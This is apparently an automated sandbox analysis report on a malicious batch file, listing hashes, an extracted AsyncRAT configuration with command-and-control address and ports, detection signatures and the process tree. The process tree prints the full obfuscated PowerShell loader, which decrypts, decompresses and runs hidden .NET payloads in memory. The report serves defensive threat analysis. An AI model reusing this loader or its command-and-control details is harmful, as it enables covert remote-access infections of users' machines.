Analysis
-
max time kernel
130s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
06-05-2024 23:00
Static task
static1
Behavioral task
behavioral1
Sample
Inital.bat
Resource
win7-20240221-en
General
-
Target
Inital.bat
-
Size
63KB
-
MD5
e9319ac7284b6bbadf0200fee286b6c1
-
SHA1
51c30382aa103118937f1a9bf453a8345febafb4
-
SHA256
09d4308c18ecece489a51b7837968bcfc6c1273d83f5c83614bbdd119ccf6961
-
SHA512
73e349b61c285cdb3cfdf41ae9ba166cc0f8e5c7b989bf744f9aa8433baf41ea3a01b46fa9a88cc97fa4ca5d80f57a9dbd8fea631a164566c9e95632c9f3404b
-
SSDEEP
1536:Z6e+aDqc6V/xOtoqfF4OycI/k0xqAD/xtM:Z6aDqpVuoqKL5fkAvM
Malware Config
Extracted
asyncrat
0.5.8
RATED
147.185.221.17:25565
147.185.221.17:37531
Dudee4vQEqBD
-
delay
3
-
install
false
-
install_file
AnticheatBiner.exe
-
install_folder
%AppData%
Signatures
-
Detect ZGRat V1 1 IoCs
resource yara_rule behavioral2/memory/2124-34-0x00000000080F0000-0x0000000008158000-memory.dmp family_zgrat_v1 -
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/2124-24-0x0000000007B40000-0x0000000007B52000-memory.dmp family_asyncrat -
Blocklisted process makes network request 5 IoCs
flow pid Process 26 2124 powershell.exe 30 2124 powershell.exe 35 2124 powershell.exe 36 2124 powershell.exe 52 2124 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2124 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2124 powershell.exe 2124 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2124 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2756 wrote to memory of 2124 2756 cmd.exe 88 PID 2756 wrote to memory of 2124 2756 cmd.exe 88 PID 2756 wrote to memory of 2124 2756 cmd.exe 88
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Inital.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rQsZbBPOPJCvxNhL0LUES/xBoGdJPo5xjQuRz/WAY2Y='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DjbA3otpI3NZoCoqJZkIpQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XrWyO=New-Object System.IO.MemoryStream(,$param_var); $udTvC=New-Object System.IO.MemoryStream; $DGCBl=New-Object System.IO.Compression.GZipStream($XrWyO, [IO.Compression.CompressionMode]::Decompress); $DGCBl.CopyTo($udTvC); $DGCBl.Dispose(); $XrWyO.Dispose(); $udTvC.Dispose(); $udTvC.ToArray();}function execute_function($param_var,$param2_var){ $ILwNn=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XDsjo=$ILwNn.EntryPoint; $XDsjo.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Inital.bat';$AUAcT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Inital.bat').Split([Environment]::NewLine);foreach ($RmJpd in $AUAcT) { if ($RmJpd.StartsWith(':: ')) { $jmZjY=$RmJpd.Substring(3); break; }}$payloads_var=[string[]]$jmZjY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2124
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82